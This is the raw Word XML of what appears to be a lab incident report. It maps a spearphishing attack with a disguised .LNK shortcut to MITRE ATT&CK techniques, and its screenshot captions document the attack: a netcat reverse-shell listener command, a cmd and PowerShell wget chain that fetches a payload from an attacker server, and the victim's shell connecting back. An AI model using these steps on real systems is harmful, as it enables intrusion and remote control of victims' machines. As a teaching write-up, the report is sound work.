                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4701E1D8" w14:textId="267681A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User (requires the user to click/open the attachment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="157B9FAB" w14:textId="2BDD7950">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="46603575" w14:textId="571348B4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technique justification (alignment to MITRE definition):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="781002A1" w14:textId="4282C46A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This incident demonstrates T1566.001 Spearphishing Attachment because the initial access vector is an email-delivered attachment (malicious .LNK shortcut) that relies on user interaction to execute. The shortcut then stages a payload download and execution that results in attacker access (reverse shell).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="0A9AB03A" w14:textId="15F453E2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="70861F52" w14:textId="5547A957">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Related techniques observed during execution (supporting evidence):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="054B5A29" w14:textId="6249130C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="76B8025A" w14:textId="734E248A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1204.002 – User Execution: Malicious File (user clicks malicious LNK)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="51CE826A" w14:textId="2505865B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="32E0A002" w14:textId="7825A705">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1105 – Ingress Tool Transfer (payload downloaded from attacker server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1DE46DAE" w14:textId="63649B08">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="13D7263B" w14:textId="5B280D0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1059.003 – Windows Command Shell (cmd.exe /c …)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="06C81F97" w14:textId="7ECD0154">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="6660D01B" w14:textId="581AE936">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1059.001 – PowerShell (powershell.exe wget …)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1E4E0B51" w14:textId="24678C58">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="5D8790F4" w14:textId="5D0452A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1070.004 – File Deletion (payload removed post-execution consistent with observed artefacts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="5A8F1AAB" w14:textId="4FE624EE"/>
    <w:p w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="33784437" w14:textId="64BD1190">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896681" w:id="15"/>
      <w:commentRangeStart w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:commentRangeEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="16"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="775771D0" w14:textId="686DD4C6"/>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="68202759" w14:textId="50A7B227">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netcat listener on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="61BA1847" w14:textId="4D042E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence: nc -lvnp 8443 listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="7CEC2105" w14:textId="360542AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E87AC76" wp14:editId="095BCF1C">
            <wp:extent cx="3542083" cy="859611"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4751917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28666" name="Picture 1996928666"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3542083" cy="859611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="3084941D" w14:textId="57A9D72D">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="41272505" w14:textId="4702273A">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="5F982E88" w14:textId="328252E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="15B693A7" w14:textId="4E82A10A">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="24896649" w14:textId="1842F51E">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="5E18DF5F" w14:textId="7DDFFAB4">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4089C32F" w14:textId="42F5FBE3">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="22A722EC" w14:textId="05825447">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="09265976" w14:textId="2E192B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C:\icrm showing the disguised shortcut notepad.exe (Shortcut) and the payload 8443 (Application)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="65FB0713" w14:textId="17BEC70E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="62E01147" w14:textId="342502E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8D061E" wp14:editId="571D60B3">
            <wp:extent cx="5829300" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918880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80343" name="Picture 1918880343"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1619250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="15CBBCF4" w14:textId="165D04F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3B677C1F" w14:textId="2D8A998C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LNK properties window showing the Target launching cmd.exe /c powershell.ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402714C5" wp14:editId="15DE11C3">
            <wp:extent cx="2121592" cy="2761727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17151750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5069" name="Picture 1715175069"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2121592" cy="2761727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6566ACAB" w14:textId="21F7403C">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="203591DD" w14:textId="5B1B5875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The full highlighted shortcut command line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="5B5BC002" w14:textId="5C4DABAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7EC236" wp14:editId="7FF60362">
            <wp:extent cx="5829300" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19437986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98654" name="Picture 1943798654"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6C805B12" w14:textId="240DBE63">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="69A24AC3" w14:textId="034449EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker netcat shows connection from victim and Windows command prompt appears</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="37AC0CDE" w14:textId="4640533D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DAE528B" wp14:editId="0B2C7F3B">
            <wp:extent cx="3086368" cy="979407"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12468741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4172" name="Picture 1246874172"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3086368" cy="979407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="75488E98" w14:textId="7CD23E5C">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="29C7DAD9" w14:textId="060FD7D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="0010EC0F" w14:textId="757AFEAA">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="4ABB64D7" w14:textId="2F784B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTTP access logs showing repeated GET /8443.exe with 200 status codes from victim IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="22C10D94" w14:textId="65693B90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FAE683C" wp14:editId="6B00BEF7">
            <wp:extent cx="5694157" cy="1554615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1825176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176830" name="Picture 1825176830"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5694157" cy="1554615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="02A65036" w14:textId="69B30FE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="37E6C425" w14:textId="07ACE596">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C:\icrm showing the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="10AC54FD" w14:textId="7514B464">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545BEC5A" wp14:editId="48B1A9C9">
            <wp:extent cx="5829300" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20917703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70340" name="Picture 2091770340"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1743075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="11E5ABC3" w14:textId="620C15DD">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="72560D4E" w14:textId="2B79575F">
      <w:pPr>
